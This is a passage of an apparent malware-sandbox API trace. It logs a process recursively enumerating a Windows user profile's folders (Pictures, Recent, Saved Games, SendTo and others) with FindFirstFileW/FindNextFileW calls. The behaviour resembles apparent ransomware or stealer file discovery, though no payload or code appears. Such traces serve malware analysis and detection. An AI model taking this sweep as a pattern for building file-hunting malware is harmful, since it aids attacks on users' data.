lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\*", lpFindFileData=0x5b8db0 | out: lpFindFileData=0x5b8db0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4387dc30, ftCreationTime.dwHighDateTime=0x1d5dfcb, ftLastAccessTime.dwLowDateTime=0x96e5d250, ftLastAccessTime.dwHighDateTime=0x1d5d88d, ftLastWriteTime.dwLowDateTime=0x96e5d250, ftLastWriteTime.dwHighDateTime=0x1d5d88d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5643f, dwReserved1=0x52aca0e0, cFileName=".", cAlternateFileName="")) returned 0x5c8d08 [0068.386] FindNextFileW (in: hFindFile=0x5c8d08, lpFindFileData=0x5b8db0 | out: lpFindFileData=0x5b8db0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4387dc30, ftCreationTime.dwHighDateTime=0x1d5dfcb, ftLastAccessTime.dwLowDateTime=0x96e5d250, ftLastAccessTime.dwHighDateTime=0x1d5d88d, ftLastWriteTime.dwLowDateTime=0x96e5d250, ftLastWriteTime.dwHighDateTime=0x1d5d88d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5643f, dwReserved1=0x52aca0e0, cFileName="..", cAlternateFileName="")) returned 1 [0068.386] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.386] FindNextFileW (in: hFindFile=0x5c8d08, lpFindFileData=0x5b8db0 | out: lpFindFileData=0x5b8db0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb972d420, ftCreationTime.dwHighDateTime=0x1d5df91, ftLastAccessTime.dwLowDateTime=0x955f4ae0, ftLastAccessTime.dwHighDateTime=0x1d5d7f4, ftLastWriteTime.dwLowDateTime=0x955f4ae0, ftLastWriteTime.dwHighDateTime=0x1d5d7f4, nFileSizeHigh=0x0, nFileSizeLow=0x11948, dwReserved0=0x1d5643f, dwReserved1=0x52aca0e0, cFileName="6rvX.bmp", cAlternateFileName="")) returned 1 [0068.386] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.386] lstrlenW (lpString="6rvX.bmp") returned 8 [0068.386] FindClose (in: hFindFile=0x5c8d08 | out: hFindFile=0x5c8d08) returned 1 [0068.386] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8db0 | out: hHeap=0x580000) returned 1 [0068.386] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5b8a40 | out: lpFindFileData=0x5b8a40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f379df0, ftCreationTime.dwHighDateTime=0x1d5e35f, ftLastAccessTime.dwLowDateTime=0xbe7e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e166, ftLastWriteTime.dwLowDateTime=0xbe7e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e166, nFileSizeHigh=0x0, nFileSizeLow=0xc69a, dwReserved0=0x370032, dwReserved1=0x510073, cFileName="pPPBMj2Kr11PcDSush8.bmp", cAlternateFileName="PPPBMJ~1.BMP")) returned 1 [0068.386] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.386] lstrlenW (lpString="pPPBMj2Kr11PcDSush8.bmp") returned 23 [0068.387] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.387] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8a40 | out: hHeap=0x580000) returned 1 [0068.387] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2955dc0, ftCreationTime.dwHighDateTime=0x1d5ddb3, ftLastAccessTime.dwLowDateTime=0x2d204ba0, ftLastAccessTime.dwHighDateTime=0x1d5dfba, ftLastWriteTime.dwLowDateTime=0x2d204ba0, ftLastWriteTime.dwHighDateTime=0x1d5dfba, nFileSizeHigh=0x0, nFileSizeLow=0x22ee, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="I0b3.bmp", cAlternateFileName="")) returned 1 [0068.387] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.387] lstrlenW (lpString="I0b3.bmp") returned 8 [0068.387] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.387] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b86f8 | out: hHeap=0x580000) returned 1 [0068.387] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a79730, ftCreationTime.dwHighDateTime=0x1d5e33f, ftLastAccessTime.dwLowDateTime=0x16f5c0d0, ftLastAccessTime.dwHighDateTime=0x1d5db87, ftLastWriteTime.dwLowDateTime=0x16f5c0d0, ftLastWriteTime.dwHighDateTime=0x1d5db87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PwBncZJNNFXo", cAlternateFileName="PWBNCZ~1")) returned 1 [0068.387] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.387] lstrlenW (lpString="PwBncZJNNFXo") returned 12 [0068.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\*", lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a79730, ftCreationTime.dwHighDateTime=0x1d5e33f, ftLastAccessTime.dwLowDateTime=0x16f5c0d0, ftLastAccessTime.dwHighDateTime=0x1d5db87, ftLastWriteTime.dwLowDateTime=0x16f5c0d0, ftLastWriteTime.dwHighDateTime=0x1d5db87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.387] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a79730, ftCreationTime.dwHighDateTime=0x1d5e33f, ftLastAccessTime.dwLowDateTime=0x16f5c0d0, ftLastAccessTime.dwHighDateTime=0x1d5db87, ftLastWriteTime.dwLowDateTime=0x16f5c0d0, ftLastWriteTime.dwHighDateTime=0x1d5db87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="..", cAlternateFileName="")) returned 1 [0068.387] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.387] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a2feb90, ftCreationTime.dwHighDateTime=0x1d5e7ba, ftLastAccessTime.dwLowDateTime=0x3d6102a0, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0x3d6102a0, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0xaed2, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="62UB-DXQ3.bmp", cAlternateFileName="62UB-D~1.BMP")) returned 1 [0068.387] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.388] lstrlenW (lpString="62UB-DXQ3.bmp") returned 13 [0068.388] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.388] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b86f8 | out: hHeap=0x580000) returned 1 [0068.388] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac4b500, ftCreationTime.dwHighDateTime=0x1d5dee1, ftLastAccessTime.dwLowDateTime=0x9ec63460, ftLastAccessTime.dwHighDateTime=0x1d5da31, ftLastWriteTime.dwLowDateTime=0x9ec63460, ftLastWriteTime.dwHighDateTime=0x1d5da31, nFileSizeHigh=0x0, nFileSizeLow=0x8e09, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tjzer.png", cAlternateFileName="")) returned 1 [0068.388] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.388] lstrlenW (lpString="Tjzer.png") returned 9 [0068.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\*", lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1958ea0, ftCreationTime.dwHighDateTime=0x1d5df1a, ftLastAccessTime.dwLowDateTime=0xe6423530, ftLastAccessTime.dwHighDateTime=0x1d5e77b, ftLastWriteTime.dwLowDateTime=0xe6423530, ftLastWriteTime.dwHighDateTime=0x1d5e77b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.388] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1958ea0, ftCreationTime.dwHighDateTime=0x1d5df1a, ftLastAccessTime.dwLowDateTime=0xe6423530, ftLastAccessTime.dwHighDateTime=0x1d5e77b, ftLastWriteTime.dwLowDateTime=0xe6423530, ftLastWriteTime.dwHighDateTime=0x1d5e77b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="..", cAlternateFileName="")) returned 1 [0068.388] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.388] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fa7c50, ftCreationTime.dwHighDateTime=0x1d5e70d, ftLastAccessTime.dwLowDateTime=0xc4740520, ftLastAccessTime.dwHighDateTime=0x1d5e41d, ftLastWriteTime.dwLowDateTime=0xc4740520, ftLastWriteTime.dwHighDateTime=0x1d5e41d, nFileSizeHigh=0x0, nFileSizeLow=0x4e79, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="cPhCCIEKuZgoipLJ.bmp", cAlternateFileName="CPHCCI~1.BMP")) returned 1 [0068.388] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.388] lstrlenW (lpString="cPhCCIEKuZgoipLJ.bmp") returned 20 [0068.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccdef330, ftCreationTime.dwHighDateTime=0x1d5db69, ftLastAccessTime.dwLowDateTime=0xbe1992b0, ftLastAccessTime.dwHighDateTime=0x1d5e74e, ftLastWriteTime.dwLowDateTime=0xbe1992b0, ftLastWriteTime.dwHighDateTime=0x1d5e74e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.389] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccdef330, ftCreationTime.dwHighDateTime=0x1d5db69, ftLastAccessTime.dwLowDateTime=0xbe1992b0, ftLastAccessTime.dwHighDateTime=0x1d5e74e, ftLastWriteTime.dwLowDateTime=0xbe1992b0, ftLastWriteTime.dwHighDateTime=0x1d5e74e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.389] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.389] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9651e10, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x5f679a00, ftLastAccessTime.dwHighDateTime=0x1d5e505, ftLastWriteTime.dwLowDateTime=0x5f679a00, ftLastWriteTime.dwHighDateTime=0x1d5e505, nFileSizeHigh=0x0, nFileSizeLow=0x1034c, dwReserved0=0x0, dwReserved1=0x0, cFileName="-G40a_oPR4.bmp", cAlternateFileName="-G40A_~1.BMP")) returned 1 [0068.389] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.389] lstrlenW (lpString="-G40a_oPR4.bmp") returned 14 [0068.389] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.389] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.389] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x661b4620, ftCreationTime.dwHighDateTime=0x1d5e0ba, ftLastAccessTime.dwLowDateTime=0x100c4c20, ftLastAccessTime.dwHighDateTime=0x1d5db47, ftLastWriteTime.dwLowDateTime=0x100c4c20, ftLastWriteTime.dwHighDateTime=0x1d5db47, nFileSizeHigh=0x0, nFileSizeLow=0x14a3f, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="Wd24fE52d7w0n.jpg", cAlternateFileName="WD24FE~1.JPG")) returned 1 [0068.389] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.389] lstrlenW (lpString="Wd24fE52d7w0n.jpg") returned 17 [0068.389] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.389] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b86f8 | out: hHeap=0x580000) returned 1 [0068.389] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb460e00, ftCreationTime.dwHighDateTime=0x1d5da35, ftLastAccessTime.dwLowDateTime=0xdd635bd0, ftLastAccessTime.dwHighDateTime=0x1d5e39b, ftLastWriteTime.dwLowDateTime=0xdd635bd0, ftLastWriteTime.dwHighDateTime=0x1d5e39b, nFileSizeHigh=0x0, nFileSizeLow=0x3111, dwReserved0=0x0, dwReserved1=0x0, cFileName="U5_G6kjJ3vwz.gif", cAlternateFileName="U5_G6K~1.GIF")) returned 1 [0068.389] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.389] lstrlenW (lpString="U5_G6kjJ3vwz.gif") returned 16 [0068.389] FindClose (in: hFindFile=0x5c8c48 | out: hFindFile=0x5c8c48) returned 1 [0068.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b84a0 | out: hHeap=0x580000) returned 1 [0068.390] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0068.390] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.390] lstrlenW (lpString="PrintHood") returned 9 [0068.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5b84a0, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d5ddca, ftLastAccessTime.dwLowDateTime=0x377f1be0, ftLastAccessTime.dwHighDateTime=0x1d5ddd4, ftLastWriteTime.dwLowDateTime=0x377f1be0, ftLastWriteTime.dwHighDateTime=0x1d5ddd4, nFileSizeHigh=0x0, nFileSizeLow=0xed8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wthAMgNSF09W7X.gif", cAlternateFileName="WTHAMG~1.GIF")) returned 0xffffffff [0068.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.390] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Recent", cAlternateFileName="")) returned 1 [0068.390] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.390] lstrlenW (lpString="Recent") returned 6 [0068.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5b84a0, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d5ddca, ftLastAccessTime.dwLowDateTime=0x377f1be0, ftLastAccessTime.dwHighDateTime=0x1d5ddd4, ftLastWriteTime.dwLowDateTime=0x377f1be0, ftLastWriteTime.dwHighDateTime=0x1d5ddd4, nFileSizeHigh=0x0, nFileSizeLow=0xed8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wthAMgNSF09W7X.gif", cAlternateFileName="WTHAMG~1.GIF")) returned 0xffffffff [0068.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.390] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0068.390] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.390] lstrlenW (lpString="Saved Games") returned 11 [0068.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c48 [0068.391] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.391] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.391] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.391] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.391] lstrlenW (lpString="desktop.ini") returned 11 [0068.391] FindClose (in: hFindFile=0x5c8c48 | out: hFindFile=0x5c8c48) returned 1 [0068.391] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.391] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Searches", cAlternateFileName="")) returned 1 [0068.391] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.391] lstrlenW (lpString="Searches") returned 8 [0068.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c48 [0068.391] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.392] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.392] lstrlenW (lpString="desktop.ini") returned 11 [0068.392] FindClose (in: hFindFile=0x5c8c48 | out: hFindFile=0x5c8c48) returned 1 [0068.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.392] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="SendTo", cAlternateFileName="")) returned 1 [0068.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.392] lstrlenW (lpString="SendTo") returned 6 [0068.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5b84a0, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0068.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.392] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0068.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.392] lstrlenW (lpString="Start Menu") returned 10 [0068.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5b84a0, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0068.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.393] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0068.393] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.393] lstrlenW (lpString="Templates") returned 9 [0068.393] FindFirstFileW (in: 